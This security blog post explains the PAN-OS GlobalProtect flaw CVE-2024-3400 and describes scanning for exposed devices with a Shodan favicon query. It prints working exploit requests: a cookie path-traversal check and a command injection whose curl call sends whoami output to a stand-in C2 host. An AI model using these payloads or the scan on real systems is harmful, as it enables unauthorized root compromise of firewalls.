Exploitation of CVE-2024–3400 | PAN-OS: OS Command Injection in GlobalProtect
Overview of CVE-2024–3400 Vulnerability and Extent of Attack
An important notice was released for PaloAlto firewall products. Kudos to team Volexity as they initial discovered this vulnerability. The PaloAlto security notice highlighted ‘A security flaw in the GlobalProtect feature of Palo Alto Networks PAN-OS software, present in certain PAN-OS versions and unique feature setups, could allow unauthorized attackers to run arbitrary code with root privileges on affected firewalls. Cloud NGFW, Panorama appliances, and Prisma Access are not affected by this vulnerability.’
Team Volexity tracked threat actor UTA0218 exploiting a command injection vulnerability in Palo Alto Networks’ firewall devices, allowing remote code execution with root privileges. The actor installed a custom Python backdoor, UPSTYLE, to execute commands on compromised devices. To read more about UPSTYLE backdoor do check Zscaler’s blog.
Exploitation occurred across multiple organizations starting March 26, 2024, with successful deployment of malicious payloads observed on April 10 and 11, 2024. Palo Alto Networks issued an advisory and is expected to release a fix by April 14, 2024.
Understanding the Attack Surface
We leveraged the favicon and supplied the query over Shodan to the identify the IPs of GloablProtect instances and found approximately +45,000.
Shodan Query: http.favicon.hash:-631559155
Understanding the exploitation of this vulnerability
This problem affects only PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls that have GlobalProtect gateway or GlobalProtect portal (or both) configured. Even if device telemetry is turned off, PAN-OS firewalls can still be vulnerable to attacks related to this issue. We noted that enabling the ‘Telemetry’ feature is necessary for exploiting this vulnerability successfully.
At this point we had list of all IPs of GlobalProtect collected from various sources and we decided to identify the instances that were vulnerable to arbitrary code execution as an unauthenticated user. The script’s main objective is to execute arbitrary code with root privileges on firewall devices that are potentially vulnerable.
There are two ways identify these vulnerabilities and exploit it:
- Path traversal
- Remote Code Execution (If Telemetry feature is enabled)
Path traversal vulnerability check:
To verify the presence of a path traversal vulnerability, an HTTP request is sent as follows:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0In this request, the Cookie header contains a path traversal payload `SESSID’
In this request, the Cookie header contains a path traversal payload (SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;). This payload attempts to create a file named poc.txt under the specified directory (/var/appweb/sslvpndocs/global-protect/portal/images/) with root privilege.
If the system is vulnerable, it will respond with a 403 status code (Forbidden) when attempting to access the poc.txt file instead of the expected 404 status code (Not Found).
To confirm the vulnerability, a subsequent HTTP request is sent to access the created file:
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: closeThis request attempts to access the poc.txt file. If the vulnerability exists, the server will respond with the contents of the poc.txt file, indicating successful exploitation of the path traversal vulnerability.
Execute arbitrary code with root privileges on the firewall
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}http://OurC2Server?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0In this HTTP request, a potential command injection payload is included in the Cookie header. The payload is SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}http://OurC2Server?test=$(whoami)`; which is crafted to exploit the vulnerability.
If the system is vulnerable, the payload will execute the whoami command, sending the output to C2Server, a domain controlled by the us. This allows the us to determine whether the system is vulnerable to command injection and potentially execute further malicious commands.
Responsible Disclosure
We have identified multiple instances of GlobalProtect IPs that exhibit exploitable vulnerabilities. Subsequently, we have diligently reported these findings to their respective owners for their attention and remedial action.
We express our gratitude to our Security Research team, ThreatWatch360 for their dedication to monitoring and securing the internet.
